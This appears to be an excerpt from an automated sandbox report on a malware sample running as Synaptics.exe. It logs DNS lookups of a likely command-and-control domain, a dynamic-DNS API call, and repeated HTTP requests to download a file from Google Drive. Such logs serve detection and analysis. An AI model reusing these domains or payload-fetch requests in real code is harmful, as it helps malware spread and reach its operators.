                                                                                                                                Dec 24, 2024 18:21:52.662435055 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.662477970 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.756345034 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.756402969 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.756546974 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.756865025 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.756875992 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.757771015 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.757803917 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.757882118 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.758393049 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.758405924 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.447761059 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.447824955 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:54.448477983 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.448539019 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:54.450927019 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.451008081 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:54.453639030 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.453697920 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.019725084 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.019753933 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.020062923 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.020119905 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.022504091 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.022533894 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.022809982 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.022865057 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.023396969 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:25.351049900 CET4973980192.168.2.469.42.215.252
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 18:20:08.194804907 CET | 192.168.2.4 | 1.1.1.1 | 0x691f | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:09.035408974 CET | 192.168.2.4 | 1.1.1.1 | 0xf76a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:09.405034065 CET | 192.168.2.4 | 1.1.1.1 | 0xe7bd | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:11.256824017 CET | 192.168.2.4 | 1.1.1.1 | 0x2d1b | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:14.493029118 CET | 192.168.2.4 | 1.1.1.1 | 0x57ce | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:20.276966095 CET | 192.168.2.4 | 1.1.1.1 | 0x3e9e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:25.047069073 CET | 192.168.2.4 | 1.1.1.1 | 0x27a6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:30.858095884 CET | 192.168.2.4 | 1.1.1.1 | 0xf0aa | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:36.033828974 CET | 192.168.2.4 | 1.1.1.1 | 0x1161 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:41.861645937 CET | 192.168.2.4 | 1.1.1.1 | 0xc03 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:48.804393053 CET | 192.168.2.4 | 1.1.1.1 | 0x15af | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:53.460629940 CET | 192.168.2.4 | 1.1.1.1 | 0x31db | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:59.288552046 CET | 192.168.2.4 | 1.1.1.1 | 0xbd22 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:04.154181957 CET | 192.168.2.4 | 1.1.1.1 | 0x5da8 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:09.945254087 CET | 192.168.2.4 | 1.1.1.1 | 0x2fa7 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:16.898288965 CET | 192.168.2.4 | 1.1.1.1 | 0x331c | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:23.804244995 CET | 192.168.2.4 | 1.1.1.1 | 0xdde6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:28.461503029 CET | 192.168.2.4 | 1.1.1.1 | 0xc121 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:34.288791895 CET | 192.168.2.4 | 1.1.1.1 | 0x3f98 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:38.945310116 CET | 192.168.2.4 | 1.1.1.1 | 0x235 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:44.757802010 CET | 192.168.2.4 | 1.1.1.1 | 0x9a3a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:49.430829048 CET | 192.168.2.4 | 1.1.1.1 | 0x94cb | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 18:20:08.331937075 CET | 1.1.1.1 | 192.168.2.4 | 0x691f | No error (0) | docs.google.com |  | 142.250.181.14 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:09.391309977 CET | 1.1.1.1 | 192.168.2.4 | 0xf76a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:09.733597994 CET | 1.1.1.1 | 192.168.2.4 | 0xe7bd | No error (0) | freedns.afraid.org |  | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:11.395231962 CET | 1.1.1.1 | 192.168.2.4 | 0x2d1b | No error (0) | drive.usercontent.google.com |  | 142.250.181.97 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:14.630218983 CET | 1.1.1.1 | 192.168.2.4 | 0x57ce | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:20.414733887 CET | 1.1.1.1 | 192.168.2.4 | 0x3e9e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:25.188361883 CET | 1.1.1.1 | 192.168.2.4 | 0x27a6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:30.996345997 CET | 1.1.1.1 | 192.168.2.4 | 0xf0aa | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:36.174249887 CET | 1.1.1.1 | 192.168.2.4 | 0x1161 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:42.002228022 CET | 1.1.1.1 | 192.168.2.4 | 0xc03 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:48.942670107 CET | 1.1.1.1 | 192.168.2.4 | 0x15af | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:53.598891973 CET | 1.1.1.1 | 192.168.2.4 | 0x31db | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:56.867109060 CET | 1.1.1.1 | 192.168.2.4 | 0x4b2b | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 18:20:56.867109060 CET | 1.1.1.1 | 192.168.2.4 | 0x4b2b | No error (0) | s-part-0035.t-0009.t-msedge.net |  | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:20:59.428158045 CET | 1.1.1.1 | 192.168.2.4 | 0xbd22 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:04.293766022 CET | 1.1.1.1 | 192.168.2.4 | 0x5da8 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:10.083967924 CET | 1.1.1.1 | 192.168.2.4 | 0x2fa7 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:17.036549091 CET | 1.1.1.1 | 192.168.2.4 | 0x331c | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:23.941631079 CET | 1.1.1.1 | 192.168.2.4 | 0xdde6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:28.599781036 CET | 1.1.1.1 | 192.168.2.4 | 0xc121 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:34.425652027 CET | 1.1.1.1 | 192.168.2.4 | 0x3f98 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:39.083194017 CET | 1.1.1.1 | 192.168.2.4 | 0x235 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:44.895529032 CET | 1.1.1.1 | 192.168.2.4 | 0x9a3a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 18:21:49.573714972 CET | 1.1.1.1 | 192.168.2.4 | 0x94cb | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                • docs.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 69.42.215.252 | 80 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 18:20:09.854350090 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                User-Agent: MyApp
                                                                                                                                Host: freedns.afraid.org
                                                                                                                                Cache-Control: no-cache
Dec 24, 2024 18:20:11.099803925 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Cache: MISS
                                                                                                                                Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:10 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-90yWv6PG7lufRyx5lJfC7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:10 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jGPW1sJTuunetI_og-htvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                2 | 192.168.2.4 | 49742 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QgONJF1PmzCzvjOF7-8biw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                3 | 192.168.2.4 | 49741 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-yzSyGkCGVG1TQv9AFiHj1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                4 | 192.168.2.4 | 49745 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:13 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-24 17:20:14 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC70QdxmDNZdx5DTEQpOmYLPo2GV89s7sNwPnTgTVf8ltExH1fG_QvaP2ga3h3u15t3l9u_V-Cs
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-qUNXnhYN0uqETZQepr5kFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Set-Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:14 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BJ4dhzLsXFZ96UbLzct4CQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                2024-12-24 17:20:14 UTC | 50 | IN | Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                5 | 192.168.2.4 | 49746 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:13 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-24 17:20:14 UTC | 1601 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4PbudubIElEXUq7-_FvvXvnoqBmoqieu386bOYLsXcjg7N4cMne8PqeghudR8srQ5vCFZpfME
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VH_xAF7kxqJOwsiCF-cVTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Set-Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:14 UTC | 1601 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H2q1wYKHC-VFNGaXCdcSow">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                2024-12-24 17:20:14 UTC | 51 | IN | Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                6 | 192.168.2.4 | 49761 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:17 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:17 GMT
